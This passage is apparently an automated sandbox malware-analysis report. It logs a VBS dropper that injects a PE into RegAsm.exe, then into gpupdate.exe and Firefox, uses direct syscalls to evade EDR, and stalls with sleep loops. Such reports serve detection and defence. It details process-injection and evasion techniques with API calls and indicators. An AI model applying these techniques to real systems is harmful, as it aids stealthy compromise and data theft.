            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Potential evasive VBS script found (sleep loop)
            Source: Initial fileInitial file: Do While Timer < start + (duration / 1000) WScript.Sleep 100
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeMemory allocated: 450000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeMemory allocated: 1FA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeMemory allocated: 450000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02260101 rdtsc 3_2_02260101
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeWindow / User API: threadDelayed 1385Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeWindow / User API: threadDelayed 8573Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\gpupdate.exeAPI coverage: 2.4 %
            Source: C:\Windows\System32\wscript.exe TID: 3364Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe TID: 3396Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exe TID: 3552Thread sleep count: 1385 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exe TID: 3552Thread sleep time: -2770000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exe TID: 3608Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exe TID: 3552Thread sleep count: 8573 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exe TID: 3552Thread sleep time: -17146000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\gpupdate.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\gpupdate.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_61E2FA4B sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,5_2_61E2FA4B
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wscript.exe, 00000000.00000003.368717055.0000000004FFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367360564.0000000004D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.368629317.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.368643114.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367391975.0000000004D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.368170791.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.368134868.0000000004F0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367422339.0000000004D60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.368427249.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.368304107.0000000004F68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.368443704.0000000004FB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s@@+um40yqC4UZtP8qNYX6ONt7OqoNe@@6rECqZUngzYYhCm9NrjUjvCY3::YzrDyn5iUdkztuLs1ZXhHgfs3u&&&hl::GKiHNt+YO6**nmb**jfrK**WfUvcD7wZ8CXS~~rwC7c@@Dapm@@Ojjl**HxwGZlZZn...iov8rdciWe+OmrEWYwO8yOj59e92huhEtx5O
            Source: wscript.exe, 00000000.00000003.372915707.0000000004FD4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.372849063.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.372865441.0000000004D9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.373006966.0000000004DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.372747849.0000000004D90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.373160010.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.373109138.0000000004FE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6rECqZUngzYYhCm9NrjUjvCY3::YzrDyn5iUdkztuLs1ZXhHgfs3u&&&hl::GKiHNt+YO6**nmb**jfrK**WfUvcD7wZ8CXS~~rwC7c
            Source: wscript.exe, 00000000.00000003.368134868.0000000004F0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.368211606.0000000004F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.368030254.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.368352793.0000000004F1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IrC))gqEmUE+wp//jculko~~jypl))4CgFLH@@))6n9a::lYOU3++orz**fUC/n~~D3e@@SFtO+dW1Nxj+wm))&&&
            Source: wscript.exe, 00000000.00000003.371504057.0000000004F8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.369070708.0000000004F7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZeLFlhgFSIldblzK::NHOHl0EeCqEUGIkYS1fxuiuka8Dv,
            Source: wscript.exe, 00000000.00000003.369314504.0000000004D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.369124322.0000000004D34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.369517755.0000000004D4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZeLFlhgFSIldblzK::NHOHl0EeCqEUGIkYS1fxuiuka8Dv
            Source: wscript.exe, 00000000.00000003.366795490.00000000052CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.366884994.00000000052F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IrC))gqEmUE+wp//jculko~~jypl))4CgFLH@@))6n9a::lYOU3++orz**fUC/n~~D3e@@SFtO+dW1Nxj+wm))&&&2
            Source: wscript.exe, 00000000.00000003.366911724.000000000522E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.366965637.0000000005236000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.366706803.0000000005142000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367141036.000000000524E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367837575.0000000005251000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.366795490.0000000005174000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367564169.0000000004DA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367117322.000000000523E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367594622.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367891983.000000000525C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xEb))eLFlhgFSIldblzK::NHOHl0EeCqEUGIkYS1fxuiuka8Dv))L/3+ySFSec**W6**O::IySl+KdbvLom6hSLvCqy1OrjK@@KrEx@@YZi8r6o3GD53Ezj2xqznj73
            Source: wscript.exe, 00000000.00000003.370100650.000000000515A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.368872251.00000000050A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DlU**odSuv&&&AOpz**WdAv0q::v+HO&&&CFK1rN2Nq@@KtfAs@@+um40yqC4UZtP8qNYX6ONt7OqoNe@@6rECqZUngzYYhCm9NrjUjvCY3::YzrDyn5iUdkztuLs1ZXhHgfs3u&&&hl::GKiHNt+YO6**nmb**jfrK**WfUvcD7wZ8CXS~~rwC7c@@Dapm@@Ojjl**HxwGZlZZn...iov8rdciWe+OmrEWYwO8yOj59e92huhEtx5OAi+lCO**2A++CvNr**paS8rHASf3bSrLp8uzwnESCG...587&&&I...oYP65UyiUK4cy7ZaLesi.oiDEjxG))dm)P
            Source: wscript.exe, 00000000.00000003.368903299.00000000051FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371828133.000000000511F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.372021104.000000000512F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371935950.0000000005124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.368872251.00000000050A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371100237.000000000511E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.369085948.0000000005245000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.368928760.0000000005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .gqEmUE+wp//jculko~~jypl
            Source: wscript.exe, 00000000.00000003.367360564.0000000004D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367391975.0000000004D3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367459446.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367422339.0000000004D60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.367526508.0000000004DA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xEb))eLFlhgFSIldblzK::NHOHl0EeCqEUGIkYS1fxuiuka8Dv))L/3+ySFSec**W6**O::IySl+KdbvLom6hSLvCqy1OrjK@@KrEx@@YZi8r6o3GD53Ezj2xqznj73q
            Source: wscript.exe, 00000000.00000003.368872251.00000000050A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.372423561.00000000050E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371543508.00000000050CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.372445926.00000000050EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DlU**odSuv&&&AOpz**WdAv0q::v+HO&&&CFK1rN2Nq@@KtfAs@@+um40yqC4UZtP8qNYX6ONt7OqoNe@@6rECqZUngzYYhCm9NrjUjvCY3::YzrDyn5iUdkztuLs1ZXhHgfs3u&&&hl::GKiHNt+YO6**nmb**jfrK**WfUvcD7wZ8CXS~~rwC7c@@Dapm@@Ojjl**HxwGZlZZn...iov8rdciWe+OmrEWYwO8yOj59e92huhEtx5OAi+lCO**2A++CvNr**paS8rHASf3bSrLp8uzwnESCG...587&&&I...oYP65UyiUK4cy7ZaLesi
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02260101 rdtsc 3_2_02260101
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022107AC NtCreateMutant,LdrInitializeThunk,3_2_022107AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02200080 mov ecx, dword ptr fs:[00000030h]3_2_02200080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022000EA mov eax, dword ptr fs:[00000030h]3_2_022000EA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022226F8 mov eax, dword ptr fs:[00000030h]3_2_022226F8
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exeFile created: temp_file_rhjRS.exe.0.drJump to dropped file
            .NET source code references suspicious native API functions
            Source: temp_file_rhjRS.exe.0.dr, Program.csReference to suspicious API methods: BaseApp.ReadProcessMemory(processHandle, address, ref baseAddress, 4, ref bytesRead)
            Source: temp_file_rhjRS.exe.0.dr, Program.csReference to suspicious API methods: BaseApp.VirtualAllocEx(processHandle, imageBase, size, 12288, 64)
            Source: temp_file_rhjRS.exe.0.dr, Program.csReference to suspicious API methods: BaseApp.WriteProcessMemory(Config.processInfo.ProcessHandle, newImageBase, executablePayload, size, ref bytesWritten)
            Allocates memory in foreign processes
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtQueryInformationProcess: Direct from: 0x774CFAFAJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtCreateKey: Direct from: 0x774CFB62Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtQuerySystemInformation: Direct from: 0x774D20DEJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtClose: Direct from: 0x774CFA02
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtCreateFile: Direct from: 0x774D00D6Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtSetTimer: Direct from: 0x774D021AJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtOpenFile: Direct from: 0x774CFD86Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtSetInformationThread: Direct from: 0x774E9893Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtOpenKeyEx: Direct from: 0x774CFA4AJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtResumeThread: Direct from: 0x774D008DJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtOpenKeyEx: Direct from: 0x774D103AJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtSetInformationProcess: Direct from: 0x774CFB4AJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtReadFile: Direct from: 0x774CF915Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtMapViewOfSection: Direct from: 0x774CFC72Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeSection loaded: NULL target: C:\Windows\SysWOW64\gpupdate.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: NULL target: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: NULL target: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\gpupdate.exeThread APC queued: target process: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Program Files (x86)\DWWejERPoDTcrsfxeOAhMTjVzpzERuomualJJpHgRWLarkTbkYTwinVxvwEbNtQYwsxTXQilCTGxWtI\LHXJJggpVplOZ.exeProcess created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\SysWOW64\gpupdate.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\wvhp9nsh.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\wvhp9nsh.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\wvhp9nsh.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\wvhp9nsh.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\wvhp9nsh.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\wvhp9nsh.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\wvhp9nsh.zip VolumeInformationJump to behavior
